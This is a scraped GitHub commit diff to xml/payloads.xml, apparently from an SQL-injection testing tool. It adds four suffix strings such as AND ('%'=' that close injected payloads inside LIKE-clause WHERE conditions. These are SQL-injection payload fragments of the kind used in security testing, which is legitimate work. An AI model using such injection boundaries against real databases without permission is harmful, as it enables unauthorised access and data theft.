Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 6fdbe4e

Browse files
committed
Fix by [email protected] (better LIKE boundaries)
1 parent b483710 commit 6fdbe4e

1 file changed

Lines changed: 4 additions & 4 deletions

File tree

xml/payloads.xml

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -453,7 +453,7 @@ Formats:
453453
<where>1,2</where>
454454
<ptype>2</ptype>
455455
<prefix>%')</prefix>
456-
<suffix></suffix>
456+
<suffix>AND ('%'='</suffix>
457457
</boundary>
458458

459459
<boundary>
@@ -462,7 +462,7 @@ Formats:
462462
<where>1,2</where>
463463
<ptype>2</ptype>
464464
<prefix>%'))</prefix>
465-
<suffix></suffix>
465+
<suffix>AND (('%'='</suffix>
466466
</boundary>
467467

468468
<boundary>
@@ -471,7 +471,7 @@ Formats:
471471
<where>1,2</where>
472472
<ptype>2</ptype>
473473
<prefix>%')))</prefix>
474-
<suffix></suffix>
474+
<suffix>AND ((('%'='</suffix>
475475
</boundary>
476476

477477
<boundary>
@@ -480,7 +480,7 @@ Formats:
480480
<where>1,2</where>
481481
<ptype>2</ptype>
482482
<prefix>%'</prefix>
483-
<suffix></suffix>
483+
<suffix>AND '%'='</suffix>
484484
</boundary>
485485
<!-- End of WHERE/HAVING clause boundaries -->
486486

0 commit comments

Comments
 (0)